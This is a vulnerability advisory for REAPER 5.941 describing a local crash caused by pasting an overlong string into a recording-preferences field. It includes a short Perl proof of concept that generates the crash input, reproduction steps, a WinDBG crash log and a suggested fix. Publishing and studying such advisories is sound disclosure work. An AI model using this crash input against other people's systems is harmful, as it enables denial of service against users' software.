Document Title: =============== Reaper 5.941 - Pointer Vulnerability Product & Service Introduction: =============================== REAPER is a complete digital audio production application for computers, offering a full multitrack audio and MIDI recording, editing, processing, mixing and mastering toolset. (Copy of the Vendor Homepage: https://www.reaper.fm/) Exploitation Technique: ======================= Local Platfom Tested: =============== Windows 7 Technical Details & Description: ================================ A Pointer vulnerability is detected on Reaper v5.941 software. A local attacker can crash the running software (reaper.exe) through an incorrect read pointer. This vulnerability allows an attacker to crash the software process after a combined application on a primary module. Vulnerable Modules: =================== [+] Options -> Preference > Recording > Input Name : `Filename format for recorded files` Proof of Concept (PoC): ======================= The vulnerability can be exploited by local attackers. For demonstration or reproduce ... 1. Launch Reaper.exe 2. Click Options -> Preference > Recording 3. Copy the AAAA...+ string from test.txt.txt to clipboard 4. Paste it the input `Filename format for recorded files` AAAA....+ string > click Wildcards and $track 5. Software Reaper will crash. -- PoC Exploit -- #!/usr/bin/perl my $Buff = "A" x 1218000; open(MYFILE,'>>test.txt'); print MYFILE $Buff; close(MYFILE); print " POC Created by ZwX"; --- Debug Session Logs [WinDBG] --- PROBLEM_CLASSES: ID: [0n309] Type: [@ACCESS_VIOLATION] Class: Addendum Scope: BUCKET_ID Name: Omit Data: Omit PID: [Unspecified] TID: [0xe2c] Frame: [0] : unknown!unknown ID: [0n281] Type: [INVALID_POINTER_READ] Class: Primary Scope: BUCKET_ID Name: Add Data: Omit PID: [Unspecified] TID: [0xe2c] Frame: [0] : unknown!unknown ID: [0n292] Type: [BAD_INSTRUCTION_PTR] Class: Primary Scope: DEFAULT_BUCKET_ID (Failure Bucket ID prefix) BUCKET_ID Name: Add Data: Omit PID: [0x1208] TID: [0xe2c] Frame: [0] : unknown!unknown BUGCHECK_STR: APPLICATION_FAULT_BAD_INSTRUCTION_PTR_INVALID_POINTER_READ PRIMARY_PROBLEM_CLASS: APPLICATION_FAULT STACK_TEXT: 0012df24 008303dd reaper+0x4303dd 0012dfac 009aaec9 reaper+0x5aaec9 0012dff4 004ac104 reaper+0xac104 0012e018 009b404f reaper+0x5b404f 0012e034 009b3f09 reaper+0x5b3f09 0012e0ed 03000000 unknown!unknown+0x0 MODULE_NAME: reaper IMAGE_NAME: reaper.exe DEBUG_FLR_IMAGE_TIMESTAMP: 5b65abe3 STACK_COMMAND: .cxr 12dc40 ; kb ; dt ntdll!LdrpLastDllInitializer BaseDllName ; dt ntdll!LdrpFailureData ; ** Pseudo Context ** Pseudo ** Value: 5a228e0 ** ; kb FAILURE_BUCKET_ID: BAD_INSTRUCTION_PTR_c0000005_reaper.exe!Unknown BUCKET_ID: APPLICATION_FAULT_BAD_INSTRUCTION_PTR_INVALID_POINTER_READ_BAD_IP_reaper+4303dd 0:000> lmvm reaper Browse full module list start end module name 00400000 00dd7000 reaper C (no symbols) Loaded symbol image file: C:\Program Files\REAPER\reaper.exe Image path: C:\Program Files\REAPER\reaper.exe Image name: reaper.exe Browse all global symbols functions data Timestamp: Sat Aug 4 06:36:35 2018 (5B65ABE3) CheckSum: 00000000 ImageSize: 009D7000 File version: 5.9.4.0 Product version: 5.9.4.0 File flags: 0 (Mask 3F) File OS: 40004 NT Win32 File type: 1.0 App File date: 00000000.00000000 Translations: 0409.04b0 Information from resource tables: CompanyName: Cockos Incorporated ProductName: REAPER InternalName: REAPER OriginalFilename: reaper.exe ProductVersion: 5.941 FileVersion: 5.941 PrivateBuild: 5.941 SpecialBuild: 5.941 FileDescription: REAPER LegalCopyright: Copyright � 2005-2018 LegalTrademarks: REAPER is a registered trademark of Cockos Incorporated Comments: REAPER is a registered trademark of Cockos Incorporated Solution - Fix & Patch: ======================= Restrict the number of characters allowed in the module entry to prevent the software from crashing. Credits & Authors: ================== Social: twitter.com/@ZwX2a Programs: vulnerability-lab.com/show.php?user=ZwX - hackerone.com/zwx - www.openbugbounty.org/researchers/ZxX/ Contact : msk4@live.fr